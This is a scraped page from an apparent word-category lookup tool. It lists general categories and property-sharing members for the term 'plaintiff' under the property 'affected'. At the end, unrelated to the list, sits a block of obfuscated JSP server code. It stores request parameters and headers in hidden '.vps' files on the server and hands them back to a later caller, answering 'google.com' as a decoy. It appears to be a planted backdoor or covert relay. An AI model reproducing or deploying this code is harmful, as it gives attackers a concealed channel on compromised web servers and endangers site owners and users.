Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
plaintiff
with nuance
affected
:
affected:person,
Simple categories matching
affected
:
population,
area,
line,
party,
organ,
agency,
entity,
settlement,
tissue,
system,
organisation,
group,
part,
region,
child,
airline,
discipline,
joint,
place,
activity,
body,
country,
people,
worker,
sector,
life,
organs,
participation,
limb,
business,
person,
problem,
institution,
Members with property
affected
:
arms,
knee,
school,
provider,
consumer,
hospital,
united_state,
golf,
hip,
hemophiliac_community,
agricultural_organisation,
security,
education_establishment,
unity_state,
rump,
industrial_area,
elbow,
ankle,
customer_organization,
nasal_passage,
shoulder,
gay_community,
state_commission,
hands,
unemployed_youth,
factory,
sec,
logistic_support,
county_clerk,
environmental_group,
shoulder_area,
child,
state,
glabella,
nursery,
elderly_woman,
frozen_shoulder,
galaxy_satellite,
esophagus,
antique_dealer,
sharecropper,
local_community,
industry,
vagina,
fire_district,
tag,
product,
liver,
widowed_woman,
homeless,
foot,
manufacturer,
creditor,
science,
bones,
friend,
trade_association,
protein,
wind-power_association,
american-indian_population,
fishmonger,
community_organization,
aviation,
host_population,
security_agency,
mole,
central_government,
castle_life,
tourism,
airline_industry,
perineum,
governmental_agency,
library,
school_segregation,
base,
airport_manager,
sun_bum,
banana_industry,
federal_reserve,
division,
court,
chest,
elderly,
youth,
skin,
environmental_organization,
software_engineering,
pesticide_applicator,
system,
business,
criminal_defendant,
labor,
local_administration,
taxpayer,
transportation,
agency,
quality_assurance,
researcher,
maintenance,
nose,
likely_contractor,
ngo,
woman,
name,
labour,
food_handler,
worker,
land,
close_friend,
victim,
united_kingdom,
driver,
activity,
ear,
utility,
abdomen,
city_department,
utility_company,
aboriginal_people,
waiter,
medium,
large_employer,
community,
first_nation,
big_toe,
vendor,
placenta,
spine,
renter,
lung,
carpal_joint,
host_community,
dana_corporation,
law-enforcement_personnel,
agriculture,
dealer,
special_district,
finger_nail,
power,
management,
sign_company,
airline,
producer,
police,
marine_hull,
plan_member,
lumbar_region,
neighbour,
orphan,
competitor,
industrial_association,
computer_name,
toe,
pleura,
utility_bill,
legs,
respiratory_tract,
environmental_authorities,
exposed_worker,
research_agency,
procurement,
metabolite,
rural_household,
union,
heart,
brain,
bowling_club,
irrigation,
regional_council,
builder,
food_service,
commerce,
indian,
local_police,
trade_contractor,
british_airway,
public_building,
sanitation_system,
black,
pharmaceutical_company,
shareholder,
selling_house,
general_public,
freight_body,
thigh,
door,
gut_mucosa,
agricultural_producer,
public-transport_operator,
church,
forehead,
landlord,
county_roads,
upper_eyelid,
water_department,
travel_sector,
family,
public,
small_business,
password_information,
conjunctiva,
anus,
family_member,
men,
sleep_problem,
em_authority,
drug_manufacturer,
gene,
ankle_bones,
hand,
user_name,
owner,
production,
minority,
local_ngo,
adoptive_sibling,
shipper,
tobacco_manufacturer,
scrotum,
fda,
immune_support,
usda,
union_steward,
college,
fuel_dealer,
software,
customer,
airway,
retail_association,
bowling,
military_department,
partner,
buttocks,
government,
bartender,
clothing_sector,
public_authorities,
american-indian_tribe,
worker_organization,
member,
fishing_industry,
tarsal,
university,
epa,
remediation_contractor,
municipal_league,
cheek,
security_adjustment,
neck,
farmland,
contractor,
fertiliser_company,
community-college_commission,
airport_company,
museum_community,
hull,
residential_home,
vulva,
supplier,
fluid_level,
temple,
finger,
sinus,
indian_tribe,
palm,
body,
exhibition,
bottom,
operations,
commission,
wrist,
indigenous_people,
penis,
biotechnology_company,
toe_nail,
employee,
professional_institution,
arm,
local_government,
parent_company,
groin,
nongovernmental-organization_ngo,
plaintiff,
windows,
basement,
emergency_service,
kidney,
commercial_building,
airport,
face,
rural_tourism,
engineering,
masonry,
club,
tidal_flats,
child_labour,
tribe,
health-care_provider,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>